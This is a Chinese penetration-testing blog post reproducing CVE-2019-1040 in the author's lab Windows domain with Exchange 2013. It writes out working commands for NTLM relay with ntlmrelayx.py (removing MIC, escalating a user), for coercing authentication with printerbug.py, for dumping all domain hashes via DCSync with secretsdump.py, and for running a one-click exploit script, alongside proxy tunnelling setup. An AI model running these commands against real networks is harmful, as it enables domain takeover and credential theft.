1. 首页
  2. 渗透测试

CVE-2019-1040内网大杀器利用

  • 前言

前两天闲来无事重新在虚拟机搭建了一个域环境,装上了EXCHANGE2013版本,于是想着顺便复现一下大杀器。

  • 背景描述:

2019年6月12日,微软官方在6月的补丁日中发布了漏洞 CVE-2019-1040的安全补丁,攻击者可以利用该漏洞绕过NTLM MIC(消息完整性检查)。攻击者可以修改NTLM身份验证流程中的签名要求,完全删除签名验证,并尝试中继到目标服务器,不强制执行签名的服务器都易受到攻击。通过这种攻击能使攻击者在仅有一个普通域账号的情况下可远程控制 Windows 域内的任何机器,包括域控服务器。

  • 漏洞利用条件

1.已有域成员账号密码,存在一台exchange服务
2.已有域成员账号密码,目标域内存在两个域。
3.这里仅演示exchange

  • 环境搭建
DC(exchange)192.168.1.104
Windows7 域内机器 192.168.1.102
Atttcker:Mac 192.168.1.100

漏洞利用过程

漏洞利用

  • VPS搭建frp代理服务端

CVE-2019-1040内网大杀器利用

  • Win7搭建代理隧道

CVE-2019-1040内网大杀器利用

  • Atttcker proxychains4

CVE-2019-1040内网大杀器利用

  • ntlmrelayx.py进行中继攻击

执行ntlmrelayx.py脚本进行NTLM中继攻击,设置SMB服务器并将认证凭据中继到LDAP协议。其中–remove-mic选项用于清除MIC标志,–escalate-user用于提升指定用户权限

proxychains4 python ntlmrelayx.py --escalate-user WIN7User -t ldap://AD.syst1m.local -smb2support --remove-mic --delegate-access

CVE-2019-1040内网大杀器利用

  • Win7搭建代理隧道

CVE-2019-1040内网大杀器利用

  • Atttcker frpc配置

CVE-2019-1040内网大杀器利用

  • Proxifier添加隧道,代理frpc

CVE-2019-1040内网大杀器利用

  • Atttcker 启动 frpc

CVE-2019-1040内网大杀器利用

  • printerbug.py脚本

触发SpoolService的bug

python printerbug.py 域/用户名:密码@打印机服务ip 回连ip
proxychains4 python printerbug.py syst1m.local/WIN7User:[email protected] 192.168.1.102

SpoolService的bug导致Exchange服务器回连到ntlmrelayx.py,即将认证信息发送到ntlmrelayx.py

CVE-2019-1040内网大杀器利用

  • ntlmrelayx.py结果

CVE-2019-1040内网大杀器利用

secretsdump.py去dcsync

  • secretsdump
proxychains4 secretsdump.py syst1m.local/[email protected] -just-dc

CVE-2019-1040内网大杀器利用

CVE-2019-1040一键化脚本

来自evi1cg师傅写的利用工具

https://github.com/Ridter/CVE-2019-1040
  • 使用方式
python CVE-2019-1040.py -ah 192.168.1.100 -u 'WIN7User' -p 'win7user521.' -d 'syst1m.local' -th 192.168.1.103 192.168.1.104
  • 漏洞利用

CVE-2019-1040内网大杀器利用

参考

https://github.com/Ridter/CVE-2019-1040
https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/

原创文章,作者:syst1m,未经授权禁止转载!如若转载,请联系作者:syst1m

联系我们

在线咨询:点击这里给我发消息

QR code